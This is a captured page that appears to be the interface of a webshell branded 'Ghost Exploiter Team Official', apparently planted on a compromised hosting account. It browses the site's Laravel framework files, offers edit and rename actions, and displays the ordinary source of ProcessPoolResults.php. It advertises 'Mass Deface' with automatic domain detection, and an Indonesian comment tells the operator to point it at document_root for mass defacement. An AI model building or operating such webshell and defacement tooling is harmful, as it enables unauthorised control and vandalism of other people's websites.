webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Process
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Exceptions
--
ren
Factory.php
8.366KB
edt
ren
FakeInvokedProcess.php
7.195KB
edt
ren
FakeProcessDescription.php
5.031KB
edt
ren
FakeProcessResult.php
4.438KB
edt
ren
FakeProcessSequence.php
3.403KB
edt
ren
InvokedProcess.php
2.599KB
edt
ren
InvokedProcessPool.php
1.429KB
edt
ren
LICENSE.md
1.05KB
edt
ren
PendingProcess.php
11.026KB
edt
ren
Pipe.php
2.775KB
edt
ren
Pool.php
2.948KB
edt
ren
ProcessPoolResults.php
1.538KB
edt
ren
ProcessResult.php
3.092KB
edt
ren
composer.json
0.918KB
edt
ren
<?php namespace Illuminate\Process; use ArrayAccess; use Illuminate\Support\Collection; class ProcessPoolResults implements ArrayAccess { /** * The results of the processes. * * @var array */ protected $results = []; /** * Create a new process pool result set. * * @param array $results * @return void */ public function __construct(array $results) { $this->results = $results; } /** * Get the results as a collection. * * @return \Illuminate\Support\Collection */ public function collect() { return new Collection($this->results); } /** * Determine if the given array offset exists. * * @param int $offset * @return bool */ public function offsetExists($offset): bool { return isset($this->results[$offset]); } /** * Get the result at the given offset. * * @param int $offset * @return mixed */ public function offsetGet($offset): mixed { return $this->results[$offset]; } /** * Set the result at the given offset. * * @param int $offset * @param mixed $value * @return void */ public function offsetSet($offset, $value): void { $this->results[$offset] = $value; } /** * Unset the result at the given offset. * * @param int $offset * @return void */ public function offsetUnset($offset): void { unset($this->results[$offset]); } }
<=Back
Liking